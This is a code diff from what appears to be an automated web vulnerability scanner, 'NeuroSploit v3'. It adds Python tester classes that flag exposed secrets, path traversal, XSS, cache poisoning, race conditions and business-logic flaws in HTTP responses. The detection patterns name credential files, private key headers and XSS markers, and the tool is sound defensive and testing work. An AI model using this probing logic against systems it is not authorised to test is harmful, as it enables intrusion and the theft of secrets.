self.name = "source_code_disclosure"
self.source_indicators = [
# Git
(r"\[core\]\s*\n\s*repositoryformatversion", "Git config exposed"),
(r"\[remote \"origin\"\]", "Git config with remote"),
(r"ref: refs/heads/", "Git HEAD reference exposed"),
# Source maps
(r"\"version\"\s*:\s*3,\s*\"sources\"", "JavaScript source map"),
(r"//[#@]\s*sourceMappingURL=", "Source map reference"),
# PHP source
(r"<\?php\s", "PHP source code"),
(r"<\?=", "PHP short tag source"),
# Python source
(r"^(?:import |from \w+ import |def \w+\(|class \w+)", "Python source code"),
# Java/JSP
(r"<%@?\s*page\s+", "JSP source code"),
(r"package\s+\w+\.\w+;", "Java package declaration"),
# Environment files
(r"(?:DB_PASSWORD|SECRET_KEY|DATABASE_URL)\s*=\s*\S+", "Environment file content"),
# Composer/package files with private repos
(r"\"require\".*\"private/", "Private package reference"),
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for source code indicators in response"""
if response_status >= 400:
return False, 0.0, None
for pattern, description in self.source_indicators:
match = re.search(pattern, response_body, re.MULTILINE)
if match:
# Git config is high confidence
if "Git" in description:
return True, 0.95, f"Source code disclosure: {description}"
# Environment file is critical
if "Environment" in description:
return True, 0.95, f"Source code disclosure: {description}"
# Source maps lower confidence (often intentional)
if "source map" in description.lower():
return True, 0.6, f"Source code disclosure: {description}"
return True, 0.8, f"Source code disclosure: {description}"
# Check for common source file access patterns
source_paths = [".git/config", ".env", ".htaccess", "web.config",
"wp-config.php", "config.php", "settings.py"]
for path in source_paths:
if path in payload and response_status == 200 and len(response_body) > 50:
return True, 0.7, f"Source code disclosure: {path} accessible"
return False, 0.0, None
class BackupFileExposureTester(BaseTester):
"""Tester for Backup File Exposure vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "backup_file_exposure"
self.file_signatures = [
# SQL dumps
(r"-- MySQL dump \d+", "MySQL database dump"),
(r"-- PostgreSQL database dump", "PostgreSQL database dump"),
(r"CREATE TABLE\s+[`\"]\w+[`\"]", "SQL DDL statements"),
(r"INSERT INTO\s+[`\"]\w+[`\"]", "SQL data dump"),
# Archive signatures (in text responses)
(r"PK\x03\x04", "ZIP archive"),
# Tar
(r"ustar\s", "TAR archive"),
# Config backups
(r"<\?xml.*<configuration>", "XML configuration backup"),
(r"server\s*\{[^}]*listen\s+\d+", "Nginx config backup"),
(r"<VirtualHost\s+", "Apache config backup"),
]
self.backup_extensions = [
".bak", ".backup", ".old", ".orig", ".save",
".swp", ".swo", ".tmp", ".temp", ".copy",
"~", ".sql", ".tar.gz", ".zip", ".dump",
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for backup file content in response"""
if response_status >= 400:
return False, 0.0, None
# Check file signatures
for pattern, description in self.file_signatures:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, f"Backup file exposure: {description} detected"
# Check if backup extension in request returned content
for ext in self.backup_extensions:
if ext in payload and response_status == 200 and len(response_body) > 100:
headers_lower = {k.lower(): v for k, v in response_headers.items()}
content_type = headers_lower.get("content-type", "").lower()
# Non-HTML responses to backup file requests are suspicious
if "text/html" not in content_type:
return True, 0.75, f"Backup file exposure: {ext} file served ({content_type})"
# HTML response but contains code-like content
if re.search(r"(?:function |class |import |require\(|define\()", response_body):
return True, 0.7, f"Backup file exposure: {ext} file contains source code"
return False, 0.0, None
class VersionDisclosureTester(BaseTester):
"""Tester for Version Disclosure mapping to known CVEs"""
def __init__(self):
super().__init__()
self.name = "version_disclosure"
# Software versions with known critical CVEs
self.vulnerable_versions = {
r"Apache/2\.4\.49\b": "CVE-2021-41773 (path traversal)",
r"Apache/2\.4\.50\b": "CVE-2021-42013 (path traversal bypass)",
r"nginx/1\.(?:[0-9]|1[0-7])\.\d+": "Potential nginx < 1.18 vulnerabilities",
r"PHP/(?:5\.\d|7\.[0-3])\.\d+": "Outdated PHP version with known CVEs",
r"OpenSSL/1\.0\.\d": "OpenSSL 1.0.x - multiple known CVEs",
r"jQuery/(?:1\.\d|2\.\d|3\.[0-4])\.\d+": "jQuery < 3.5 - XSS via htmlPrefilter",
r"WordPress/(?:[1-4]\.\d|5\.[0-7])": "Outdated WordPress version",
r"Drupal/(?:[1-7]\.\d|8\.[0-5])": "Outdated Drupal version",
r"Rails/(?:[1-4]\.\d|5\.[01])": "Outdated Rails version",
r"Spring Framework/(?:[1-4]\.\d|5\.[0-2])": "Outdated Spring version",
r"Express/(?:[1-3]\.\d|4\.(?:1[0-6]))": "Outdated Express.js version",
r"Django/(?:1\.\d|2\.[01]|3\.0)": "Outdated Django version",
r"Log4j.(?:2\.(?:0|1[0-4])\.\d)": "CVE-2021-44228 (Log4Shell)",
r"Tomcat/(?:[1-8]\.\d|9\.[0-3]\d\.\d)": "Potentially outdated Tomcat",
r"IIS/(?:[1-9]\.0|10\.0)": "IIS version disclosure",
}
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for version strings mapping to known CVEs"""
# Combine headers and body for scanning
headers_str = "\n".join(f"{k}: {v}" for k, v in response_headers.items())
full_text = headers_str + "\n" + response_body
findings = []
for pattern, cve_info in self.vulnerable_versions.items():
match = re.search(pattern, full_text, re.IGNORECASE)
if match:
version_str = match.group(0)
findings.append(f"{version_str} - {cve_info}")
if findings:
# Known CVEs are high confidence
has_cve = any("CVE-" in f for f in findings)
confidence = 0.9 if has_cve else 0.7
return True, confidence, f"Version disclosure: {'; '.join(findings[:3])}"
# Generic version disclosure in Server header
headers_lower = {k.lower(): v for k, v in response_headers.items()}
server = headers_lower.get("server", "")
if re.search(r"/\d+\.\d+", server):
return True, 0.5, f"Version disclosure in Server header: {server}"
return False, 0.0, None
@@ -201,3 +201,156 @@ class FileUploadTester(BaseTester):
return True, 0.8, "Executable file path returned - possible RCE"
return False, 0.0, None
class ArbitraryFileReadTester(BaseTester):
"""Tester for Arbitrary File Read vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "arbitrary_file_read"
self.sensitive_file_patterns = {
# /etc/passwd format
r"root:.*:0:0:": "/etc/passwd",
r"daemon:.*:\d+:\d+:": "/etc/passwd",
r"nobody:.*:\d+:\d+:": "/etc/passwd",
# .env file patterns
r"(?:DB_PASSWORD|DATABASE_URL|SECRET_KEY|API_KEY|APP_SECRET)\s*=": ".env file",
r"(?:AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)\s*=": ".env file (AWS credentials)",
# SSH key headers
r"-----BEGIN (?:RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----": "SSH/TLS private key",
r"-----BEGIN CERTIFICATE-----": "TLS certificate",
# Shadow file
r"root:\$[0-9a-z]+\$": "/etc/shadow",
# Config files
r"<\?php.*\$db": "PHP config with DB credentials",
}
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for sensitive file contents in response"""
for pattern, file_desc in self.sensitive_file_patterns.items():
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.95, f"Arbitrary file read confirmed: {file_desc} content detected"
# Check for base64-encoded sensitive content
base64_pattern = re.findall(r'[A-Za-z0-9+/]{40,}={0,2}', response_body)
for b64_match in base64_pattern[:5]: # Check first 5 matches
try:
import base64
decoded = base64.b64decode(b64_match).decode('utf-8', errors='ignore')
if re.search(r"root:.*:0:0:", decoded) or re.search(r"-----BEGIN.*PRIVATE KEY-----", decoded):
return True, 0.9, "Arbitrary file read: Base64-encoded sensitive file content"
except Exception:
pass
return False, 0.0, None
class ArbitraryFileDeleteTester(BaseTester):
"""Tester for Arbitrary File Delete vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "arbitrary_file_delete"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for successful file deletion indicators"""
body_lower = response_body.lower()
# Check for explicit deletion success messages
delete_success_patterns = [
r"file\s+(?:has been\s+)?(?:deleted|removed)\s+successfully",
r"(?:deleted|removed)\s+successfully",
r'"success"\s*:\s*true.*(?:delet|remov)',
r'"status"\s*:\s*"(?:deleted|removed)"',
r'"message"\s*:\s*".*(?:deleted|removed).*"',
]
for pattern in delete_success_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.85, "Arbitrary file delete: Deletion success confirmed in response"
# Check for 200/204 on DELETE request with traversal path
traversal_indicators = ["../", "..\\", "%2e%2e", "..%2f", "..%5c"]
has_traversal = any(t in payload.lower() for t in traversal_indicators)
if has_traversal:
if response_status == 204:
return True, 0.8, "Arbitrary file delete: 204 No Content after path traversal delete"
if response_status == 200:
return True, 0.7, "Arbitrary file delete: 200 OK after path traversal delete request"
# Check for file-not-found on subsequent access (context-based)
if context.get("follow_up_status") == 404:
return True, 0.85, "Arbitrary file delete: File not found after deletion request"
return False, 0.0, None
class ZipSlipTester(BaseTester):
"""Tester for Zip Slip (path traversal in archive extraction)"""
def __init__(self):
super().__init__()
self.name = "zip_slip"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for path traversal in archive extraction"""
body_lower = response_body.lower()
# Check for traversal path acceptance in response
traversal_patterns = [
r"\.\./\.\./\.\./",
r"\.\.\\\.\.\\\.\.\\",
r"%2e%2e%2f",
r"%2e%2e/",
]
for pattern in traversal_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
# Traversal path echoed in response
if response_status in [200, 201]:
return True, 0.8, "Zip Slip: Path traversal sequence accepted in archive extraction"
# Check for successful extraction with traversal payload
if response_status in [200, 201]:
extraction_success = [
r"extract(?:ed|ion)\s+(?:successful|complete)",
r"(?:file|archive)\s+(?:uploaded|processed)\s+successfully",
r'"extracted"\s*:\s*true',
r'"files"\s*:\s*\[.*\.\./.*\]',
]
for pattern in extraction_success:
if re.search(pattern, response_body, re.IGNORECASE):
if any(t in payload for t in ["../", "..\\", "%2e%2e"]):
return True, 0.85, "Zip Slip: Archive with traversal paths extracted successfully"
# Check for file written outside expected directory
overwrite_indicators = [
r"(?:overwr(?:ote|itten)|replaced)\s+.*(?:/etc/|/var/|/tmp/|C:\\)",
r"(?:created|wrote)\s+.*\.\./",
]
for pattern in overwrite_indicators:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, "Zip Slip: File written outside extraction directory"
return False, 0.0, None
@@ -150,3 +150,360 @@ class HTTPMethodsTester(BaseTester):
return True, 0.6, f"{payload} method accepted"
return False, 0.0, None
class DirectoryListingTester(BaseTester):
"""Tester for Directory Listing exposure"""
def __init__(self):
super().__init__()
self.name = "directory_listing"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for directory listing patterns"""
if response_status == 200:
listing_patterns = [
r"<title>Index of\s*/",
r"Index of\s*/",
r"<h1>Index of",
r"Directory listing for\s*/",
r"<title>Directory listing",
r'<a\s+href="\.\./">\.\./</a>',
r"Parent Directory</a>",
r'\[DIR\]',
r'\[TXT\]',
r"<pre>.*<a href=",
]
for pattern in listing_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, "Directory listing: Server directory contents exposed"
# Check for Apache/Nginx-specific listing
if re.search(r'<address>Apache/[\d.]+ .* Server at', response_body, re.IGNORECASE):
if "Index of" in response_body:
return True, 0.95, "Directory listing: Apache directory listing enabled"
return False, 0.0, None
class DebugModeTester(BaseTester):
"""Tester for Debug Mode/Page exposure"""
def __init__(self):
super().__init__()
self.name = "debug_mode"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for debug pages, stack traces with source paths"""
# Werkzeug/Flask debugger
werkzeug_patterns = [
r"Werkzeug\s+Debugger",
r"werkzeug\.debug",
r"<div class=\"debugger\">",
r"The debugger caught an exception",
r"__debugger__",
]
for pattern in werkzeug_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.95, "Debug mode: Werkzeug interactive debugger exposed (RCE risk)"
# Laravel debug
laravel_patterns = [
r"Whoops!.*Laravel",
r"Ignition\s",
r"vendor/laravel",
r"Laravel.*Exception",
r"app/Http/Controllers",
]
for pattern in laravel_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, "Debug mode: Laravel debug page exposed"
# Django debug
django_patterns = [
r"You\'re seeing this error because you have <code>DEBUG = True</code>",
r"Django Version:",
r"Traceback.*django",
r"INSTALLED_APPS",
r"settings\.py",
]
for pattern in django_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, "Debug mode: Django debug page exposed"
# Generic stack traces with source paths
stack_trace_patterns = [
r"(?:File|at)\s+[\"']?(?:/[a-z]+/|C:\\)[^\s\"']+\.(?:py|php|rb|js|java|go)\b",
r"Traceback \(most recent call last\)",
r"Stack trace:.*(?:\.php|\.py|\.rb|\.java)",
r"(?:Error|Exception)\s+in\s+(?:/[a-z]+/|C:\\)[^\s]+:\d+",
]
for pattern in stack_trace_patterns:
if re.search(pattern, response_body, re.IGNORECASE | re.DOTALL):
return True, 0.8, "Debug mode: Stack trace with source file paths exposed"
# ASP.NET detailed errors
if re.search(r"Server Error in '/' Application", response_body):
return True, 0.85, "Debug mode: ASP.NET detailed error page exposed"
return False, 0.0, None
class ExposedAdminPanelTester(BaseTester):
"""Tester for Publicly Accessible Admin Panel"""
def __init__(self):
super().__init__()
self.name = "exposed_admin_panel"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for admin login pages accessible publicly"""
if response_status == 200:
admin_panel_patterns = [
(r"(?:admin|administrator)\s+(?:login|panel|dashboard|console)", "admin login page"),
(r"<title>[^<]*(?:admin|dashboard|control\s*panel|cms)[^<]*</title>", "admin title"),
(r"wp-login\.php", "WordPress login"),
(r"wp-admin", "WordPress admin"),
(r"/admin/login", "admin login endpoint"),
(r"phpmyadmin", "phpMyAdmin"),
(r"adminer\.php", "Adminer"),
(r"cPanel", "cPanel"),
(r"Webmin", "Webmin"),
(r"Plesk", "Plesk"),
(r"joomla.*administrator", "Joomla admin"),
(r"drupal.*user/login", "Drupal admin login"),
]
for pattern, panel_name in admin_panel_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.75, f"Exposed admin panel: {panel_name} accessible publicly"
return False, 0.0, None
class ExposedApiDocsTester(BaseTester):
"""Tester for Publicly Accessible API Documentation"""
def __init__(self):
super().__init__()
self.name = "exposed_api_docs"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for Swagger/OpenAPI documentation pages"""
if response_status == 200:
api_docs_patterns = [
(r"swagger-ui", "Swagger UI"),
(r'"swagger"\s*:\s*"[0-9.]+"', "Swagger spec"),
(r'"openapi"\s*:\s*"[0-9.]+"', "OpenAPI spec"),
(r"swagger-ui-bundle\.js", "Swagger UI bundle"),
(r"<title>Swagger UI</title>", "Swagger UI page"),
(r"redoc", "ReDoc API docs"),
(r"api-docs", "API documentation"),
(r"graphiql", "GraphiQL interface"),
(r"GraphQL Playground", "GraphQL Playground"),
(r'"paths"\s*:\s*\{', "OpenAPI paths object"),
(r'"info"\s*:\s*\{.*"title"\s*:', "OpenAPI info object"),
]
for pattern, doc_type in api_docs_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.8, f"Exposed API docs: {doc_type} publicly accessible"
# Check content type for JSON API specs
content_type = response_headers.get("Content-Type", "")
if "json" in content_type.lower():
if re.search(r'"paths"\s*:\s*\{.*"(?:get|post|put|delete)"', response_body, re.DOTALL):
return True, 0.85, "Exposed API docs: OpenAPI/Swagger JSON specification exposed"
return False, 0.0, None
class InsecureCookieFlagsTester(BaseTester):
"""Tester for Missing Secure/HttpOnly/SameSite Cookie Flags"""
def __init__(self):
super().__init__()
self.name = "insecure_cookie_flags"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check Set-Cookie headers for missing security flags"""
# Collect all Set-Cookie headers
set_cookie_values = []
for key, value in response_headers.items():
if key.lower() == "set-cookie":
if isinstance(value, list):
set_cookie_values.extend(value)
else:
set_cookie_values.append(value)
if not set_cookie_values:
return False, 0.0, None
issues = []
for cookie in set_cookie_values:
cookie_lower = cookie.lower()
cookie_name = cookie.split("=")[0].strip()
# Session cookies are more critical
is_session = any(
s in cookie_name.lower()
for s in ["session", "sess", "sid", "token", "auth", "jwt", "csrf"]
)
missing_flags = []
if "secure" not in cookie_lower:
missing_flags.append("Secure")
if "httponly" not in cookie_lower:
missing_flags.append("HttpOnly")
if "samesite" not in cookie_lower:
missing_flags.append("SameSite")
if missing_flags:
severity = "session cookie" if is_session else "cookie"
issues.append(f"{cookie_name} ({severity}): missing {', '.join(missing_flags)}")
if issues:
confidence = 0.8 if any("session cookie" in i for i in issues) else 0.6
return True, confidence, f"Insecure cookie flags: {'; '.join(issues[:3])}"
return False, 0.0, None
class HttpSmugglingTester(BaseTester):
"""Tester for HTTP Request Smuggling (CL/TE discrepancy)"""
def __init__(self):
super().__init__()
self.name = "http_smuggling"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for CL/TE discrepancy indicators"""
# Check for request smuggling indicators
smuggling_indicators = [
# Different response than expected
(r"400 Bad Request.*(?:Content-Length|Transfer-Encoding)", "CL/TE parsing error"),
(r"(?:invalid|malformed)\s+(?:chunk|transfer.encoding)", "chunked encoding error"),
]
for pattern, desc in smuggling_indicators:
if re.search(pattern, response_body, re.IGNORECASE | re.DOTALL):
return True, 0.7, f"HTTP smuggling indicator: {desc}"
# Check for dual Transfer-Encoding handling
te_header = response_headers.get("Transfer-Encoding", "")
cl_header = response_headers.get("Content-Length", "")
if te_header and cl_header:
return True, 0.75, "HTTP smuggling: Both Transfer-Encoding and Content-Length in response"
# Check for timeout-based detection (context)
if context.get("response_time_ms", 0) > 10000:
if "transfer-encoding" in payload.lower() or "content-length" in payload.lower():
return True, 0.6, "HTTP smuggling: Abnormal response delay with CL/TE payload"
# Check for response desync indicators
if response_status == 0 or context.get("connection_reset"):
return True, 0.65, "HTTP smuggling: Connection reset/timeout with smuggling payload"
return False, 0.0, None
class CachePoisoningTester(BaseTester):
"""Tester for Web Cache Poisoning"""
def __init__(self):
super().__init__()
self.name = "cache_poisoning"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for cached response with injected unkeyed input"""
if response_status == 200:
# Check for cache headers indicating response was cached
cache_indicators = {
"X-Cache": response_headers.get("X-Cache", ""),
"CF-Cache-Status": response_headers.get("CF-Cache-Status", ""),
"Age": response_headers.get("Age", ""),
"X-Varnish": response_headers.get("X-Varnish", ""),
}
is_cached = False
for header, value in cache_indicators.items():
if value:
if any(hit in value.upper() for hit in ["HIT", "STALE"]):
is_cached = True
break
if header == "Age" and int(value or 0) > 0:
is_cached = True
break
# Check if our unkeyed input is reflected in the cached response
if is_cached or response_headers.get("Cache-Control", ""):
# Common unkeyed headers that might be reflected
unkeyed_indicators = [
r"X-Forwarded-Host", r"X-Forwarded-Scheme",
r"X-Original-URL", r"X-Rewrite-URL",
]
if payload in response_body:
if is_cached:
return True, 0.9, "Cache poisoning: Injected unkeyed input reflected in cached response"
else:
return True, 0.7, "Cache poisoning: Unkeyed input reflected - verify caching"
# Check for Vary header missing expected values
vary = response_headers.get("Vary", "")
cache_control = response_headers.get("Cache-Control", "")
if "no-store" not in cache_control and "private" not in cache_control:
if payload in response_body:
return True, 0.6, "Cache poisoning potential: Input reflected in cacheable response"
return False, 0.0, None
+92 -21
View File
@@ -35,20 +35,15 @@ class XSSReflectedTester(BaseTester):
# Check if payload is reflected
if payload in response_body:
# Check if it's in a dangerous context
dangerous_patterns = [
rf'<script[^>]*>{re.escape(payload)}',
rf'on\w+\s*=\s*["\']?{re.escape(payload)}',
rf'javascript:\s*{re.escape(payload)}',
rf'<[^>]+{re.escape(payload)}[^>]*>',
]
for pattern in dangerous_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, f"XSS payload reflected in dangerous context: {pattern}"
# Payload reflected but possibly encoded
return True, 0.7, "XSS payload reflected in response"
# Use context-aware analysis to determine execution position
from backend.core.xss_context_analyzer import analyze_xss_execution_context
ctx = analyze_xss_execution_context(response_body, payload)
if ctx["executable"]:
return True, 0.95, f"XSS payload in auto-executing context: {ctx['detail']}"
elif ctx["interactive"]:
return True, 0.85, f"XSS payload in interactive context: {ctx['detail']}"
# Reflected but not in executable position
return True, 0.5, f"XSS payload reflected but {ctx['context']}: {ctx['detail']}"
# Check for partial reflection (script tags, etc.)
for marker in self.markers:
@@ -59,11 +54,21 @@ class XSSReflectedTester(BaseTester):
class XSSStoredTester(BaseTester):
"""Tester for Stored XSS vulnerabilities"""
"""Tester for Stored XSS vulnerabilities.
Supports two-phase verification:
Phase 1: analyze_response() - Check if submission succeeded (data stored)
Phase 2: analyze_display_response() - Check if payload executes on display page
"""
def __init__(self):
super().__init__()
self.name = "xss_stored"
self.storage_indicators = [
"success", "created", "saved", "posted", "submitted",
"thank", "comment", "added", "published", "updated",
"your comment", "your post", "your message",
]
def analyze_response(
self,
@@ -73,12 +78,78 @@ class XSSStoredTester(BaseTester):
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for stored XSS - requires subsequent request verification"""
# For stored XSS, we need to check if data was stored
# This is a simplified check - full implementation would verify on retrieval
if response_status in [200, 201, 302]:
if "success" in response_body.lower() or "created" in response_body.lower():
return True, 0.5, "Data possibly stored - verify retrieval for stored XSS"
"""Phase 1: Check if payload was likely stored.
Returns confidence 0.3-0.5 for storage-only confirmation.
Full confirmation requires Phase 2 (analyze_display_response).
"""
body_lower = response_body.lower()
# Redirect after POST is a common form submission pattern
if response_status in [301, 302, 303]:
return True, 0.4, "Redirect after submission - payload likely stored"
if response_status in [200, 201]:
# Check for storage success indicators
for indicator in self.storage_indicators:
if indicator in body_lower:
return True, 0.4, f"Storage indicator found: '{indicator}'"
# Check if payload is reflected in the same response (immediate display)
if payload in response_body:
dangerous = [
"<script", "onerror=", "onload=", "onclick=", "onfocus=",
"onmouseover=", "<svg", "<img", "<iframe", "javascript:"
]
payload_lower = payload.lower()
for ctx in dangerous:
if ctx in payload_lower:
return True, 0.8, f"Stored XSS: payload reflected in dangerous context ({ctx})"
return True, 0.6, "Payload reflected in submission response"
# POST returning 200 often means submission accepted
if response_status == 200 and context.get("method") == "POST":
return True, 0.3, "POST returned 200 - submission possibly accepted"
return False, 0.0, None
def analyze_display_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Phase 2: Verify payload executes on the display page.
Called after navigating to the page where stored content is rendered.
"""
if response_status >= 400:
return False, 0.0, None
# Check if payload exists unescaped in display page
if payload in response_body:
# Use context-aware analysis to determine execution position
from backend.core.xss_context_analyzer import analyze_xss_execution_context
ctx = analyze_xss_execution_context(response_body, payload)
if ctx["executable"]:
return True, 0.95, f"Stored XSS confirmed: {ctx['detail']}"
elif ctx["interactive"]:
return True, 0.90, f"Stored XSS (interaction required): {ctx['detail']}"
# Payload present but not executable
return True, 0.5, f"Stored payload on display page but {ctx['context']}: {ctx['detail']}"
# Check for core execution markers even if full payload is modified
core_markers = [
"alert(1)", "alert(document.domain)", "onerror=alert",
"onload=alert", "onfocus=alert", "ontoggle=alert",
]
body_lower = response_body.lower()
for marker in core_markers:
if marker in payload.lower() and marker in body_lower:
return True, 0.85, f"Stored XSS: execution marker '{marker}' found on display page"
return False, 0.0, None
+457
View File
@@ -0,0 +1,457 @@
"""
NeuroSploit v3 - Logic and Protocol Vulnerability Testers
Testers for race conditions, business logic, rate limiting, parameter pollution,
type juggling, timing attacks, host header injection, HTTP smuggling, cache poisoning.
"""
import re
from typing import Tuple, Dict, Optional
from backend.core.vuln_engine.testers.base_tester import BaseTester
class RaceConditionTester(BaseTester):
"""Tester for Race Condition vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "race_condition"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for duplicate operation success indicators"""
body_lower = response_body.lower()
# Multiple success responses from concurrent requests
if context.get("concurrent_successes", 0) > 1:
return True, 0.85, f"Race condition: {context['concurrent_successes']} concurrent requests succeeded"
# Double-spend / duplicate operation indicators
duplicate_indicators = [
"already processed", "duplicate", "already exists",
"already applied", "already redeemed",
]
# If we got a success despite expected duplicate check
if response_status in [200, 201]:
success_words = ["success", "created", "processed", "applied", "completed", "confirmed"]
if any(w in body_lower for w in success_words):
if context.get("request_count", 0) > 1:
return True, 0.7, "Race condition: operation succeeded multiple times"
# Check for resource count discrepancy
if "balance" in body_lower or "quantity" in body_lower or "count" in body_lower:
numbers = re.findall(r'"(?:balance|quantity|count|amount)"\s*:\s*(-?\d+\.?\d*)', response_body)
if numbers and context.get("expected_value") is not None:
try:
actual = float(numbers[0])
expected = float(context["expected_value"])
if actual != expected:
return True, 0.75, f"Race condition: value mismatch (expected {expected}, got {actual})"
except (ValueError, IndexError):
pass
return False, 0.0, None
class BusinessLogicTester(BaseTester):
"""Tester for Business Logic vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "business_logic"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for business logic bypass indicators"""
body_lower = response_body.lower()
# Negative value acceptance
if re.search(r"-\d+", payload):
if response_status == 200:
if any(w in body_lower for w in ["success", "accepted", "processed", "approved"]):
return True, 0.8, "Business logic: negative value accepted"
# Check for negative pricing
if re.search(r'"(?:total|price|amount)"\s*:\s*-\d+', response_body):
return True, 0.9, "Business logic: negative price/amount in response"
# Zero-value bypass
if payload.strip() in ["0", "0.00", "0.0"]:
if response_status == 200 and "success" in body_lower:
return True, 0.75, "Business logic: zero value accepted for transaction"
# Workflow step skip
if context.get("skipped_step"):
if response_status == 200:
return True, 0.7, f"Business logic: step '{context['skipped_step']}' was skippable"
# Discount/coupon abuse
if "coupon" in payload.lower() or "discount" in payload.lower():
if re.search(r'"discount"\s*:\s*(?:100|[1-9]\d{2,})', response_body):
return True, 0.8, "Business logic: excessive discount applied"
# Role/privilege escalation via parameter
if any(w in payload.lower() for w in ["admin", "role=admin", "is_admin=true", "privilege"]):
if response_status == 200 and "admin" in body_lower:
return True, 0.6, "Business logic: privilege escalation parameter accepted"
return False, 0.0, None
class RateLimitBypassTester(BaseTester):
"""Tester for Rate Limit Bypass vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "rate_limit_bypass"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for continued success after many requests (bypass)"""
headers_lower = {k.lower(): v for k, v in response_headers.items()}
# After many requests, still getting 200
request_count = context.get("request_count", 0)
if request_count > 50 and response_status == 200:
# Check rate limit headers
remaining = headers_lower.get("x-ratelimit-remaining",
headers_lower.get("x-rate-limit-remaining",
headers_lower.get("ratelimit-remaining")))
if remaining is not None:
try:
if int(remaining) > 0:
return True, 0.6, f"Rate limit not enforced after {request_count} requests (remaining: {remaining})"
except ValueError:
pass
else:
# No rate limit headers at all
return True, 0.7, f"No rate limiting detected after {request_count} requests"
# Rate limit bypass via header manipulation
bypass_headers = ["x-forwarded-for", "x-real-ip", "x-originating-ip", "x-client-ip"]
if any(h in payload.lower() for h in bypass_headers):
if response_status == 200 and context.get("was_rate_limited"):
return True, 0.85, "Rate limit bypassed via IP spoofing header"
# Check if 429 was expected but got 200
if context.get("expected_429") and response_status == 200:
return True, 0.8, "Expected 429 (rate limited) but received 200"
return False, 0.0, None
class ParameterPollutionTester(BaseTester):
"""Tester for HTTP Parameter Pollution vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "parameter_pollution"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for different behavior with duplicate parameters"""
# Compare response with baseline (single param)
if "baseline_body" in context and "baseline_status" in context:
baseline_len = len(context["baseline_body"])
current_len = len(response_body)
diff = abs(current_len - baseline_len)
# Significant response difference
if diff > 200:
return True, 0.7, f"Parameter pollution: response differs by {diff} bytes from baseline"
# Status code difference
if response_status != context["baseline_status"]:
return True, 0.75, f"Parameter pollution: status changed from {context['baseline_status']} to {response_status}"
# Check if attacker-controlled value was used
if "neurosploit" in payload and "neurosploit" in response_body:
if context.get("original_value") and context["original_value"] not in response_body:
return True, 0.8, "Parameter pollution: attacker value used instead of original"
# WAF bypass via duplicate params
if context.get("waf_blocked_original") and response_status == 200:
return True, 0.8, "Parameter pollution: WAF bypass - blocked payload succeeded with duplicate params"
return False, 0.0, None
class TypeJugglingTester(BaseTester):
"""Tester for Type Juggling / Type Coercion vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "type_juggling"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
